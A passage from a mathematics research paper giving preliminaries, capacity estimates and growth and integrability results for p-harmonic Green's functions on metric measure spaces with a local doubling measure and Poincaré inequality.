exists a constant $\alpha \geq 1$ such that for all balls $B(x,r)\subset X$, $0<r\leq R_K$, each pair of distinct points in the annulus $B(x,2r)\setminus\overline{B}(x,r)$ can be connected by a rectifiable path in the annulus $B(x,2\alpha r)\setminus\overline{B}(x,r/\alpha)$. Hereafter, the constants $C_K, R_K$ and $\tau_K$ will be referred to as the *local parameters* of $K$. We also say that a constant $C$ depends on the local doubling constant of $K$ if $C$ depends on $C_K$. The above assumptions encompass, e.g., all Riemannian manifolds with Ric $\geq 0$, but they also include all Carnot–Carathéodory spaces, and therefore, in particular, all Carnot groups. For a detailed discussion of these facts we refer the reader to the paper by Garofalo–Nhieu [@GaNhi]. In the case of Carnot–Carathéodory spaces, recall that if the Lie algebra generating vector fields grow at infinity faster than linearly, then the compactness of metric balls of large radii may fail in general. Consider for instance in ${\mathbb{R}}$ the smooth vector field of Hörmander type $X_1=(1+x^2)\frac{d}{dx}$. Some direct calculations prove that the distance relative to $X_1$ is given by $d(x,y)=|\arctan(x)-\arctan(y)|$, and therefore, if $r\geq \pi/2$, we have $B(0,r)={\mathbb{R}}$. Local doubling property ----------------------- We note that assumption (ii) implies that for every compact set $K\subset X$ with local parameters $C_K$ and $R_K$, for any $x\in K$ and every $0<r\leq R_K$, one has for $1\leq \lambda \leq R_K/r$, $$\label{dc} \mu(B(x,\lambda r)) \leq C\lambda^Q\mu(B(x,r)),$$ where $Q=\log_2C_K$, and the constant $C$ depends only on the local doubling constant $C_K$. The exponent $Q$ serves as a local dimension of the doubling measure $\mu$ restricted to the compact set $K$. For $x\in X$ we define the *pointwise dimension* $Q(x)$ by $$\begin{aligned} Q(x) = \sup\{& q > 0:\ \exists C>0\ \textrm{ such that } \\ &\lambda^q\mu(B(x,r)) \leq C\mu(B(x,\lambda r)), \\ & \textrm{ for all } 1\leq\lambda<\operatorname{diam}X \textrm{ and } 0<r<\infty\}.\end{aligned}$$ The inequality readily implies that $Q(x) \leq Q$ for every $x\in K$. Moreover, it follows that $$\label{lowerbound} \lambda^{Q(x)}\mu(B(x,r)) \leq C\mu(B(x,\lambda r))$$ for any $x \in K$, $0<r\leq R_K$ and $1\leq \lambda \leq R_K/r$, and the constant $C$ depends on the local doubling constant $C_K$. Furthermore, for all $0<r\leq R_K$ and $x\in K$ $$\label{bounds} C_1r^Q \leq \frac{\mu(B(x,r))}{\mu(B(x,R_K))} \leq C_2r^{Q(x)},$$ where $C_1=C(K, C_K)$ and $C_2= C(x,K,C_K)$. For more on doubling measures, see, e.g. Heinonen [@heinonen] and the references therein. Upper gradients --------------- A nonnegative Borel function $g$ on $X$ is an *upper gradient* of an extended real valued function $f$ on $X$ if for all rectifiable paths $\gamma$ joining points $x$ and $y$ in $X$ we have $$\label{ug-cond} |f(x)-f(y)|\le \int_\gamma g\,ds.$$ whenever both $f(x)$ and $f(y)$ are finite, and $\int_{\gamma}g\, ds=\infty $ otherwise. See Cheeger [@Cheeger], Shanmugalingam [@Sh-rev], and Heinonen–Koskela [@HeKo] for a discussion on upper gradients. If $g$ is a nonnegative measurable function on $X$ and if (\[ug-cond\]) holds for [[$p\mspace{1mu}$]{}]{}-almost every path, then $g$ is a *weak upper gradient* of $f$. By saying that (\[ug-cond\]) holds for [[$p\mspace{1mu}$]{}]{}-almost every path we mean that it fails only for a path family with zero [[$p\mspace{1mu}$]{}]{}-modulus (see, for example, [@Sh-rev]). If $f$ has an upper gradient in $L^p(X)$, then it has a *minimal weak upper gradient* $g_f \in L^p(X)$ in the sense that for every [[$p\mspace{1mu}$]{}]{}-weak upper gradient $g \in L^p(X)$ of $f$, $g_f \le g$ $\mu$-almost everywhere (a.e.), see Corollary 3.7 in Shanmugalingam [@Sh-harm]. The minimal weak upper gradient can be obtained by the formula $$g_f(x) := \inf_g \limsup_{r\to0{{\mathchoice{\raise.17ex\hbox{$\scriptstyle +$}} {\raise.17ex\hbox{$\scriptstyle +$}} {\raise.1ex\hbox{$\scriptscriptstyle +$}} {\scriptscriptstyle +}}}}{\vint}_{B(x,r)} g\,{d\mu},$$ where the infimum is taken over all upper gradients $g \in L^p(X)$ of $f$, see Lemma 2.3 in Björn [@Bj]. Capacity -------- Let ${\Omega}\subset X$ be open and $K \subset {\Omega}$ compact. The *relative [[$p\mspace{1mu}$]{}]{}-capacity* of $K$ with respect to ${\Omega}$ is the number $$\operatorname{Cap}_p (K,{\Omega}) =\inf\int_{\Omega}g_u^p\,d\mu,$$ where the infimum is taken over all functions $u \in {N^{1,p}}(X)$ such that $u=1$ on $K$ and $u=0$ on $X\setminus{\Omega}$. If such functions do not exist, we set $\operatorname{Cap}_p (K,{\Omega})=\infty$. When ${\Omega}=X$ we simply write $\operatorname{Cap}_p(K)$. Observe that the infimum above could be taken over all functions $u \in \operatorname{Lip}_0({\Omega})=\{f \in \operatorname{Lip}(X):\ f=0 \textrm{ on } X\setminus{\Omega}\}$ such that $u=1$ on $K$. In addition, the relative [[$p\mspace{1mu}$]{}]{}-capacity is a Choquet capacity and consequently for all Borel sets $E$ we have $$\operatorname{Cap}_p (E,{\Omega}) = \sup\{\operatorname{Cap}_p(K):\ K\subset E,\ K\textrm{ compact}\}.$$ For other properties as well as equivalent definitions of the capacity we refer to Kilpeläinen et al. [@KiKiMa], Kinnunen–Martio [@KiMa96; @KiMaNov], and Kallunki–Shanmugalingam [@KaSh]. Finally, we say that a property holds *[[$p\mspace{1mu}$]{}]{}-quasieverywhere* if the set of points for which the property does not hold is of zero capacity. Newtonian spaces ---------------- We define Sobolev spaces on the metric space following Shanmugalingam [@Sh-rev]. Let ${\Omega}\subseteq X$ be nonempty and open. Whenever $u\in L^p({\Omega})$, let $$\|u\|_{{N^{1,p}}({\Omega})} = \biggl( \int_{\Omega}|u|^p \, {d\mu}+ \inf_g \int_{\Omega}g^p \, {d\mu}\biggr)^{1/p},$$ where the infimum is taken over all weak upper gradients of $u$. The *Newtonian space* on ${\Omega}$ is the quotient space $${N^{1,p}}({\Omega}) = \{u: \|u\|_{{N^{1,p}}({\Omega})} <\infty \}/{\sim},$$ where $u \sim v$ if and only if $\|u-v\|_{{N^{1,p}}({\Omega})}=0$. The Newtonian space is a Banach space and a lattice, moreover Lipschitz functions are dense, see [@Sh-rev] and Björn et al. [@BBS]. To be able to compare the boundary values of Newtonian functions we need a Newtonian space with zero boundary values. Let $E$ be a measurable subset of $X$. The *Newtonian space with zero boundary values* is the space $${N^{1,p}}_0(E)=\{u|_{E} : u \in {N^{1,p}}(X) \text{ and } u=0 \text{ on } X {\setminus}E\}.$$ The space ${N^{1,p}}_0(E)$ equipped with the norm inherited from ${N^{1,p}}(X)$ is a Banach space, see Theorem 4.4 in Shanmugalingam [@Sh-harm]. We say that $u$ belongs to the *local Newtonian space* ${N^{1,p}}{_{\rm loc}}(\Omega)$ if $u\in {N^{1,p}}({\Omega}')$ for every open ${\Omega}'\Subset\Omega$ (or equivalently that $u\in {N^{1,p}}(E)$ for every measurable $E\Subset\Omega$). We will also need an inequality for Newtonian functions with zero boundary values. If $f\in{N^{1,p}}_0(B(x,r))$, then there exists a constant $C>0$ only depending on $p$, the local doubling constant, and the constants in the weak Poincaré inequality, such that $$\label{eq:SoboPI} \biggl({\vint}_{B(x,r)}|f|^{p}\, d\mu\biggr)^{1/p} \leq Cr\biggl({\vint}_{B(x,r)}g_f^p\,d\mu\biggr)^{1/p}$$ for every ball $B(x,r)$ with $r\leq \frac1{3}\operatorname{diam}X$. For this result we refer to Kinnunen and Shanmugalingam [@KiSh1]. Differentiable structure ------------------------ Cheeger [@Cheeger] demonstrated that metric measure spaces that satisfy assumptions (ii) and (iii) admit a differentiable structure with which Lipschitz functions can be differentiated almost everywhere. This differentiable structure gives rise to an alternative definition of a Sobolev space over the given metric measure space than defined above. However, assuming (ii) and (iii) these definitions lead to the same space, see Shanmugalingam [@Sh-rev Theorem 4.10]. Thanks to a deep theorem by Cheeger the corresponding Sobolev space is reflexive, see [@Cheeger Theorem 4.48]. The differentiable structure gives the notion of partial derivatives in the following theorem, see Cheeger [@Cheeger Theorem 4.38], and it is compatible with the notion of an upper gradient. Let $X$ be a metric measure space equipped with a doubling Borel regular measure $\mu$. Assume that $X$ admits a weak $(1,p_0)$-Poincaré inequality for some $1<p_0<\infty$. Then there exists measurable sets $U_\alpha$ with positive measure such that $$\mu(X\setminus\bigcup_\alpha U_\alpha) =0,$$ and Lipschitz “coordinate charts” $$\mathcal{X}^\alpha = (X_1^\alpha,\ldots,X_{k(\alpha)}^\alpha):X\to{\mathbb{R}}^{k(\alpha)}$$ such that for each $\alpha$ functions $X_1^\alpha,\ldots,X_{k(\alpha)}^\alpha$ are linearly independent on $U_\alpha$ and $$1\leq k(\alpha) \leq N,$$ where $N$ is a constant depending only on the doubling constant of $\mu$ and the constants in the Poincaré inequality. Moreover, if $f:X\to{\mathbb{R}}$ is Lipschitz, then there exist unique (up to a set of measure zero) bounded vector-valued functions $d^\alpha f:U_\alpha \to {\mathbb{R}}^{k(\alpha)}$ such that $$\lim_{r\to 0{{\mathchoice{\raise.17ex\hbox{$\scriptstyle +$}} {\raise.17ex\hbox{$\scriptstyle +$}} {\raise.1ex\hbox{$\scriptscriptstyle +$}} {\scriptscriptstyle +}}}}\sup_{x\in B(x_0,r)} \frac{|f(x)-f(x_0)-d^\alpha f\cdot(\mathcal{X}^\alpha(x)-\mathcal{X}^\alpha(x_0))|}{r} = 0$$ for $\mu$-a.e. $x_0 \in U_\alpha$. We can assume that the sets $U_\alpha$ are pairwise disjoint, and extend $d^\alpha f$ by zero outside $U_\alpha$. Regard $d^\alpha f$ as vectors in ${\mathbb{R}}^N$ and let $Df := \sum_\alpha d^\alpha f$. By Shanmugalingam [@Sh-rev Theorem 4.10] and [@Cheeger Theorem 4.47], the Newtonian space $N^{1,p_0}(X)$ is equal to the closure in the $N^{1,p_0}$-norm of the collection of (locally) Lipschitz functions on $X$, then the derivation operator $D$ can be extended to all of $N^{1,p_0}(X)$ so that there exists a constant $C>0$ such that $$C^{-1}|Df(x)| \leq g_f(x) \leq C|Df(x)|$$ for all $f\in N^{1,p_0}(X)$ and $\mu$-a.e. $x\in X$. Here the norms $|\cdot|$ can be chosen to be inner product norms. The differential mapping $Df$ satisfies the product and chain rules: if $f$ is a bounded Lipschitz function on $X$, $u\in N^{1,p_0}(X)$, and $h:{\mathbb{R}}\to{\mathbb{R}}$ is continuously differentiable with bounded derivative, then $uf$ and $h\circ u$ both belong to $ N^{1,p_0}(X)$ and $$\begin{aligned} D(uf) & = uDf + fDu; \\ D(h\circ u) = (h\circ u)'Du.\end{aligned}$$ See the discussion in Cheeger [@Cheeger] and Keith [@Keith]. [[$p\mspace{1mu}$]{}]{}-harmonic functions ------------------------------------------ Let ${\Omega}\subset X$ be a domain. A function $u \in {N^{1,p}}{_{\rm loc}}({\Omega})\cap C({\Omega})$ is *[[$p\mspace{1mu}$]{}]{}-harmonic* in ${\Omega}$ if for all relatively compact sets ${\Omega}'\subset{\Omega}$ and for all ${\varphi}\in {N^{1,p}}_0({\Omega}')$, $$\int_{{\Omega}'}g_u^p\,d\mu \leq \int_{{\Omega}'}g_{u+{\varphi}}^p\,d\mu.$$ It is known that nonnegative [[$p\mspace{1mu}$]{}]{}-harmonic functions satisfy Harnack’s inequality and the strong maximum principle, there are no non-constant nonnegative [[$p\mspace{1mu}$]{}]{}-harmonic functions on all of $X$, and [[$p\mspace{1mu}$]{}]{}-harmonic functions have locally Hölder continuous representatives. See [@KiSh1]. As a consequence of the $\operatorname{LLC}$ property of $X$ a nonnegative [[$p\mspace{1mu}$]{}]{}-harmonic function on an annulus $B(y,Cr)\setminus B(y,r/C)$ satisfies Harnack’s inequality on the sphere $S(y,r)=\{x\in X:\ d(x,y) = r\}$ for sufficiently small $r$, see Björn et al. [@BMcSha Lemma 5.3]. We also say that a function $u \in {N^{1,p}}{_{\rm loc}}({\Omega})\cap C({\Omega})$ is *Cheeger [[$p\mspace{1mu}$]{}]{}-harmonic* in ${\Omega}$ if in the above definition upper gradients $g_u$ and $g_{u+{\varphi}}$ are replaced by $|Du|$ and $|D(u+{\varphi})|$, respectively. Note that by a result in Cheeger [@Cheeger], the Cheeger [[$p\mspace{1mu}$]{}]{}-harmonic functions are [[$p\mspace{1mu}$]{}]{}-quasiminimizers in the sense of, e.g., Kinnunen–Shanmugalingam [@KiSh1]. Moreover, the Cheeger [[$p\mspace{1mu}$]{}]{}-harmonic functions can be characterized in terms of a weak formulation of the [[$p\mspace{1mu}$]{}]{}-Laplace equation: $u$ is Cheeger [[$p\mspace{1mu}$]{}]{}-harmonic if and only if $$\int_{{\Omega}'}|Du|^{p-2}Du\cdot D{\varphi}\, d\mu = 0$$ for all ${\Omega}'$ and ${\varphi}$ as in the above definition. Capacitary estimates ==================== The aim of this section is to recall sharp capacity estimates for metric rings with unrelated radii proved in [@GaMa]. We emphasize an interesting feature of Theorems \[thm:below\] and \[thm:above\] that cannot be observed in the setting of, for example, Carnot gouprs. That is the dependence of the estimates on the center of the ring. This is a consequence of the fact that in the general setting $Q(x_0) \neq Q$ where $x_0 \in X$, see Section \[prelim\]. The results in this section will play an important role in the subsequent developments. (Estimates from below) \[thm:below\] Let ${\Omega}\subset X$ be a bounded open set, $x_0 \in {\Omega}$, and $Q(x_0)$ be the pointwise dimension at $x_0$. Then there exists $R_0({\Omega})>0$ such that for any $0<r<R\leq R_0({\Omega})$ we have $$\begin{aligned} & \operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R)) \geq \\ & \left\{\begin{array}{ll} C_1(1-\frac{r}{R})^{p_0(p_0-1)}\frac{\mu(B(x_0,r))}{r^{p_0}},\ \textrm{ if }\ 1<p_0<Q(x_0), \\ C_2(1-\frac{r}{R})^{Q(x_0)(Q(x_0)-1)}\biggl(\log\frac{R}{r}\biggr)^{1-Q(x_0)}, \ \textrm{ if }\ p_0=Q(x_0), \\ C_3(1-\frac{r}{R})^{p_0(p_0-1)}\biggl|(2R)^{\frac{p_0-Q(x_0)}{p_0-1}}-r^{\frac{p_0-Q(x_0)}{p_0-1}}\biggr|^{1-p_0},\ \textrm{ if }\ p_0>Q(x_0), \end{array} \right.\end{aligned}$$ where $$\begin{aligned} C_1 & = C\biggl(1-\frac1{2^{\frac{Q(x_0)-p_0}{p_0-1}}}\biggr)^{p_0-1}, \\ C_2 & =C\frac{\mu(B(x_0,r))}{r^{Q(x_0)}},\\ C_3 & =C\frac{\mu(B(x_0,r))}{r^{Q(x_0)}}\biggl(2^{\frac{p_0-Q(x_0)}{p_0-1}}-1\biggr)^{p_0-1},\end{aligned}$$ with $C > 0$ depending only on $p_0$ and the local doubling constant of ${\Omega}$. Observe that if $X$ supports the weak $(1,1)$-Poincaré inequality, i.e. $p_0 =1$, these estimates reduce to the capacitary estimates, e.g., in Capogna et al. [@CaDaGa Theorem 4.1]. (Estimates from above) \[thm:above\] Let ${\Omega}$, $x_0$, and $Q(x_0)$ be as in Theorem \[thm:below\]. Then there exists $R_0({\Omega})>0$ such that for any $0<r<R\leq R_0({\Omega})$ we have $$\begin{aligned} & \operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R)) \\ & \leq \left\{\begin{array}{ll} C_4\frac{\mu(B(x_0,r))}{r^{p_0}}, & \textrm{ if }\, 1<p_0<Q(x_0), \\ C_5\biggl(\log\frac{R}{r}\biggr)^{1-Q(x_0)}, & \textrm{ if }\, p_0=Q(x_0), \\ C_6\left|(2R)^{\frac{p_0-Q(x_0)}{p_0-1}}-r^{\frac{p_0-Q(x_0)}{p_0-1}}\right|^{1-p_0}, & \textrm{ if }\, p_0>Q(x_0), \end{array} \right.\end{aligned}$$ where $C_4$ is a positive constant depending only on $p_0$ and the local doubling constant of ${\Omega}$, whereas $$C_5 = C\frac{\mu(B(x_0,r))}{r^{Q(x_0)}},$$ where $C$ is a positive constants depending only on $p_0$ and the local doubling constant of ${\Omega}$, and $$C_6 =C\biggl(2^{\frac{p_0-Q(x_0)}{p_0-1}}-1\biggr)^{-1},$$ with $C > 0$ depending on $p_0$, the local parameters of ${\Omega}$, and $\mu(B(x_0,R_0))$. We have the following immediate corollary. If $1< p_0 \leq Q(x_0)$, then we have $$\label{eq:singleton} \operatorname{Cap}_{p_0}(\{x_0\},{\Omega}) = 0.$$ Green’s functions ================= We define a Green’s function on metric spaces following Holopainen and Shanmugalingam [@HoSha]. Note that Holopainen and Shanmugalingam referred to this function class as singular functions. We consider here a definition that uses an equation for [[$p\mspace{1mu}$]{}]{}-capacities of level sets. Green’s function on a Riemannian manifold satisfies this equation, see Holopainen [@Holopainen]. \[def:G\] Given $1<p_0\leq Q(x_0)$, let ${\Omega}\subset X$ be a relatively compact domain, and $x_0 \in {\Omega}$. An extended real-valued function $G = G(\cdot,x_0)$ on ${\Omega}$ is said to be a *Green’s function with singularity at $x_0$* if the following criteria are satisfied: 1. $G$ is [[$p\mspace{1mu}$]{}]{}$_0$-harmonic and positive in ${\Omega}\setminus\{x_0\}$, 2. $G|_{X\setminus{\Omega}}=0$ [[$p\mspace{1mu}$]{}]{}-quasieverywhere and $G\in N^{1,p_0}_{{_{\rm loc}}}(X\setminus B(x_0,r))$ for all $r>0$, 3. $x_0$ is a singularity, i.e., $$\lim_{x\to x_0}G(x) = \infty.$$ 4. whenever $0\leq\alpha < \beta$, $$C_1(\beta-\alpha)^{1-p_0}\leq \operatorname{Cap}_{p_0}({\Omega}^\beta,{\Omega}_\alpha)) \leq C_2(\beta-\alpha)^{1-p_0},$$ where ${\Omega}^\beta = \{x\in{\Omega}:\ G(x)\geq \beta\}$, ${\Omega}_\alpha = \{x\in{\Omega}:\ G(x) > \alpha\}$, and $C_1,\,C_2 >0$ are constants depending only on $p_0$. (Existence) The existence of Green’s functions in the $Q$-regular metric space setting was first proved by Holopainen and Shanmugalingam in [@HoSha]. Being a $Q$-regular metric measure space means that the measure $\mu$ satisfies, for all balls $B(x,r)$ a double inequality $$C^{-1}r^Q\leq \mu(B(x,r))\leq Cr^Q$$ with a fixed constant $Q$. There are, however, many instances where the $Q$-regularity condition is not satisfied. For example, systems of vector fields of Hörmander type are, in general, not $Q$-regular for any $Q>0$. In [@GaMa] the $Q$-regularity assumption was removed and the existence of this function class was proved in more general setting. For the proof of the existence, we refer to [@HoSha Theorem 3.4], see also remarks in [@GaMa]. (Uniqueness) It is not known whether a Green’s function is unique in the metric space setting even in the case of Cheeger [[$p\mspace{1mu}$]{}]{}-harmonic functions. Indeed, the uniqueness of Green’s functions is not settled in Carnot groups when $1<p_0<Q$, where $Q$ is the homogeneous dimension attached to the non-isotropic dilations. However, Green’s function is known to be unique when $p_0=Q$, see Balogh et al. [@BHT]. Local behavior of [[$p\mspace{1mu}$]{}]{}-harmonic Green’s functions ==================================================================== We begin by recalling that if $K\subset{\Omega}$ is closed, $u\in N^{1,p_0}(X)$ is a *[[$p\mspace{1mu}$]{}]{}$_0$-potential* of $K$ (with respect to ${\Omega}$) if - $u$ is [[$p\mspace{1mu}$]{}]{}$_0$-harmonic on ${\Omega}\setminus K$; - $u=1$ on $K$ and $u=0$ in $X\setminus{\Omega}$. By Lemma 3.3 in Holopainen–Shanmugalingam [@HoSha] [[$p\mspace{1mu}$]{}]{}$_0$-potentials always exist if $\operatorname{Cap}_{p_0}(K,{\Omega})<\infty$. From know on, we set $$m(r) = m_G(x_0,r) = \min_{\partial B(x_0,r)}G, \quad M(r)=M_G(x_0,r) = \max_{\partial B(x_0,r)}G,$$ where $G$ is a Green’s function with singularity at $x_0$. We can now state the following growth estimates for a Green’s function near a singularity. In what follows, $R_0({\Omega}) >0$ is the constant from theorems \[thm:below\] and \[thm:above\]. \[thm:blowupI\] Let ${\Omega}$ be a relatively compact domain in $X$, $x_0 \in {\Omega}$, and $1<p\leq Q(x_0)$. If $G$ is a Green’s function with singularity at $x_0$ and given $0<R\leq R_0({\Omega})$ for which $\overline{B}(x_0,R) \subset {\Omega}$, then for every $0<r<R$ we have $$m_G(x_0,r) \leq C_1\biggl(\frac1{\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R))} \biggr)^{1/(p_0-1)} +M_G(x_0,R).$$ Suppose $r_0 \in (0,R)$ is such that $m_G(x_0,r_0)\geq M_G(x_0,R)$, then for every $0<r<r_0$ we have $$M_G(x_0,r) \geq C_2\biggl(\frac1{\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,r_0))} \biggr)^{1/(p_0-1)} + M_G(x_0,R),$$ where the constants $C_1$ and $C_2$ both depend only on $p_0$. Consider a radius $R>0$ such that $\overline{B}(x_0,R)\subset{\Omega}$. Since $G(x) \to \infty$ when $x$ tends to $x_0$, the maximum principle implies that $$\label{eq:minest} m(r) \geq m(\rho), \quad 0<r<\rho<R.$$ Define $w=G-M(R)$, and hence $w\leq 0$ on $\partial B(x_0,R)$. Observe that the first inequality in the theorem obviously holds true if $m(r) \leq M(R)$, thus, we might as well assume that $$\label{assumption1} m(r) > M(R),$$ and consider the function $v$ in the annulus $B(x_0,R)\setminus\overline{B}(x_0,r)$ defined by $$v = \left\{\begin{array}{ll} 0, & \textrm{ if }\ G\leq M(R), \\ w, & \textrm{ if }\ M(R) < G < m(r), \\ m_w(r), & \textrm{ if }\ G \geq m(r). \end{array} \right.$$ If we extend $v$ by letting $v=m_w(r)$ on $\overline{B}(x_0,r)$, then $v\in N^{1,p_0}_0(B(x_0,R))$. Our assumption implies that $m_w(r)=m(r)-M(R) > 0$, so the function $${\varphi}= \frac{v}{m_w(r)},$$ which equals to $1$ in $\overline{B}(x_0,r)$, is both an admissible function for the capacity of $\overline{B}(x_0,r)$ with respect to $B(x_0,R)$ and the [[$p\mspace{1mu}$]{}]{}$_0$-potential of the set $\{x\in X:\ {\varphi}(x)\geq 1\}$ with respect to the set $\{x\in X:\ {\varphi}(x)>0\}$. Thus one has $$\begin{aligned} & \operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R)) \leq \int_{B(x_0,R)} g_{{\varphi}}^{p_0}\,d\mu \\ & = \operatorname{Cap}_{p_0}(\{x\in X:\ {\varphi}(x)\geq 1\},\{x\in X:\ {\varphi}(x)>0\}) \\ & = \operatorname{Cap}_{p_0}(\{x\in X:\ G(x)\geq m(r)\},\{x\in X:\ G(x)>M(R)\}) \\ & \leq C_1(m(r)-M(R))^{1-p_0},\end{aligned}$$ where we used criterion 4 from Definition \[def:G\] and the fact that ${\varphi}\geq 1$ or ${\varphi}>0$ if and only if $G\geq m(r)$ or $G>M(r)$, respectively. This implies the first claim. To prove the second iequality of the claim, let $w=G-M(R)$. Let $r_0\in(0,R)$ be such that $m(r_0)\geq M(R)$. This implies that $w\geq 0$ on $\overline{B}(x_0,r_0)$ and also that $M(r)\geq M(R)$, for all $0<r<r_0$. Hence, by the maximum principle we have that $$\{x\in {\Omega}:\ G(x)\geq M(r)\} \subset \overline{B}(x_0,r)$$ and $$B(x_0,r_0) \subset \{x\in{\Omega}:\ G(x)>M(R)\}.$$ Hence it follows that $$\begin{aligned} & \operatorname{Cap}_{p_0}(\overline{B}(x_0,r), B(x_0,r_0)) \\ & \geq \operatorname{Cap}_{p_0}(\{x\in {\Omega}:\ G(x)\geq M(r)\}, B(x_0,r_0)) \\ & \geq \operatorname{Cap}_{p_0}(\{x\in {\Omega}:\ G(x)\geq M(r)\},\{x\in{\Omega}:\ G(x)>M(R)\}) \\ & \geq C_2(M(r)-M(R))^{1-p_0}, \end{aligned}$$ which implies the second claim and the proof is complete. Theorem 7.1 in Capogna et al. [@CaDaGa] is slightly incorrect as the additional term $M(R)$ is missing from the left-hand and the right-hand side in (ii). However, this does not affect the results in that paper since the additional term can be absorbed when establishing results on the behavior near a singularity. We have the following result on the local behavior of a Green’s function near a singularity. \[thm:localbI\] Let ${\Omega}$ be a relatively compact domain in $X$, and $x_0 \in {\Omega}$. If $G$ is a Green’s function with singularity at $x_0$, then there exist positive constants $C_1,C_2$ and $R_0$ such that for any $0<r<\frac{R_0}{2}$ and $x \in B(x_0,r)$ we have $$\begin{aligned} C_1\biggl(\frac{d(x,x_0)^{p_0}}{\mu(B(x_0,d(x,x_0)))}\biggr)^{1/(p_0-1)} & \leq G(x) \\ & \leq C_2\biggl(\frac{d(x,x_0)^{p_0}}{\mu(B(x_0,d(x,x_0)))}\biggr)^{1/(p_0-1)},\end{aligned}$$ when $1<p_0<Q(x_0)$, whereas $$C_1 \log\left(\frac{R_0}{d(x,x_0)}\right) \leq G(x) \leq C_2\log\left(\frac{R_0}{d(x,x_0)}\right),$$ when $p_0=Q(x_0)$. Here the constants $C_1$ and $C_2$ depend on $p_0$, $x_0$, and the local parameters of ${\Omega}$, whereas constant $R_0$ depends only on ${\Omega}$. Let $R_0=\min\{r_0,R_0({\Omega})\}$, where $r_0>0$ is from the second estimate in Theorem \[thm:blowupI\]. The Harnack inequality on a sphere implies that there exists a constant $C>0$ such that $$M(r) \leq Cm(r).$$ for every $0< r < R_0$. Let, in particular, $r:=d(x_0,x) < \frac{R_0}{2}$. From the first estimate in Theorem \[thm:blowup\], the maximum principle, and the Harnack inequality on the sphere, we obtain for any $0< r < \frac{R_0}{2}$ $$\begin{aligned} G(x) & \leq M(r) \leq Cm(r) \\ & \leq C\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R_0))^{-1/(p_0-1)}.\end{aligned}$$ Thanks to Theorem \[thm:below\] we have $$\begin{aligned} G(x) & \leq C\biggl(1-\frac{r}{R_0}\biggr)^{-p_0}\biggl(\frac{r^{p_0}}{\mu(B(x_0,r))}\biggr)^{1/(p_0-1)} \\ & \leq C\biggl(\frac{r^{p_0}}{\mu(B(x_0,r))}\biggr)^{1/(p_0-1)},\end{aligned}$$ when $1<p<Q(x_0)$, and $$G(x) \leq C\log\left(\frac{R_0}{r}\right),$$ when $p=Q(x_0)$. This proves the estimate from above. To show the estimate from below, observe that the second estimate in Theorem \[thm:blowupI\], the maximum principle, and the Harnack inequality on a sphere imply for $0<r< R_0$ $$\begin{aligned} G(x) & \geq m(r) \geq C^{-1}M(r) \\ & \geq C\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R_0))^{-1/(p_0-1)}\end{aligned}$$ Applying Theorem \[thm:above\] we conclude for $1<p_0<Q(x_0)$ $$G(x) \geq C\biggl(\frac{r^{p_0}}{\mu(B(x_0,r))}\biggr)^{1/(p_0-1)},$$ and for $p_0=Q(x_0)$ that $$G(x) \geq C\log\left(\frac{R_0}{r}\right).$$ This completes the proof. Note that if $1<p_0<Q(x_0)$ then due to , it readily follows that $$C_1d(x,x_0)^{(p_0-Q(x_0))/(p_0-1)} \leq G(x) \leq C_2d(x,x_0)^{(p_0-Q)/(p_0-1)},$$ when $x \in B(x_0,r)$ with $0<r<\frac{R_0}{2}$. Here the constants $C_1$ and $C_2$ depend on $p_0,\, x_0$ and the local parameters of ${\Omega}$. In general Green’s function $G\notin L^{p_0}_{{_{\rm loc}}}({\Omega})$, but as a corollary of Theorem \[thm:localbI\] we have the following integrability result near a singularity. Let $1<p_0<Q(x_0)$. Under the assumptions of Theorem \[thm:localb\], one has - $$G \in \bigcap_{0<q<\frac{Q(x_0)(p_0-1)}{Q-p_0}}L^q(B(x_0,r)),$$ - $$g_G \in \bigcap_{0<q<\frac{Q(x_0)(p_0-1)}{Q-1}}L^q(B(x_0,r)),$$ - If $p_0 > (Q + Q(x_0) - 1)/Q(x_0)$, then $$G \in \bigcap_{1< q<\frac{Q(x_0)(p_0-1)}{Q-1}}N_0^{1,q}(B(x_0,r)).$$ The proof of (i) is an immediate consequence of the estimate from above in Theorem \[thm:localb\]. To prove (ii), we note that since $1<p_0<Q(x_0)\leq Q$, $$q^*:=\frac{Q(x_0)(p_0-1)}{Q-1} < p_0.$$ Applying Hölder’s inequality, the Caccioppoli inequality, see Björn–Marola [@BjMa Proposition 7.1], and again Theorem \[thm:localb\], we find for $0<q<p$ and for $\sigma \in (0,r)$ $$\int_{B(x_0,2\sigma)\setminus B(x_0,\sigma)}g_G^q\, d\mu \leq C\sigma^{Q(x_0)-\frac{q(Q-1)}{p_0-1}}.$$ Note that the exponent $Q(x_0)-\frac{q(Q-1)}{p_0-1}$ is strictly positive, when $0<q<q^*$ and zero when $q=q^*$. This observation gives us that $$\begin{aligned} \int_{B(x_0,r)}g_G^q\, d\mu & = \sum_{i=0}^\infty\int_{B(x_0,2^{-i}r)\setminus B(x_0,2^{-(i+1)}r)}g_G^q\, d\mu \\ & \leq C\mu(B(x_0,r))\sum_{i=0}^\infty(2^{-i}r)^{Q(x_0)-\frac{q(Q-1)}{p_0-1}}< \infty.\end{aligned}$$ This proves (ii). Finally, (iii) follows from (ii) once we observe that the condition $p_0 > (Q+Q(x_0)-1)/Q(x_0)$ is equivalent to $Q(x_0)(p_0-1)/(Q-1) > 1$. Cheeger singular functions ========================== In this section we study Cheeger singular functions, i.e. functions that satisfy *only* conditions 1, 2 and 3 in Definition \[def:G\] and the notion of a [[$p\mspace{1mu}$]{}]{}$_0$-harmonic function is replaced by that of a Cheeger [[$p\mspace{1mu}$]{}]{}$_0$-harmonic function. Let $G'$ be a functions that satisfies conditions 1.–3. in Definition \[def:G\]. We begin by defining $K(G)$ by $$\label{eq:Ku} K(G') = \int_{\Omega}|DG'|^{p_0-2}DG'\cdot D{\varphi}\, d\mu,$$ where ${\varphi}\in N^{1,p_0}_0({\Omega})$ is such that ${\varphi}= 1$ in a neighborhood of $x_0$. If ${\varphi}_i\in N^{1,p_0}_0({\Omega}), i=1,2,$ and ${\varphi}_i=1$ in a neighborhood of $x_0$ then ${\varphi}={\varphi}_1-{\varphi}_2\in N^{1,p_0}_0({\Omega}\setminus\{x_0\})$. This gives us 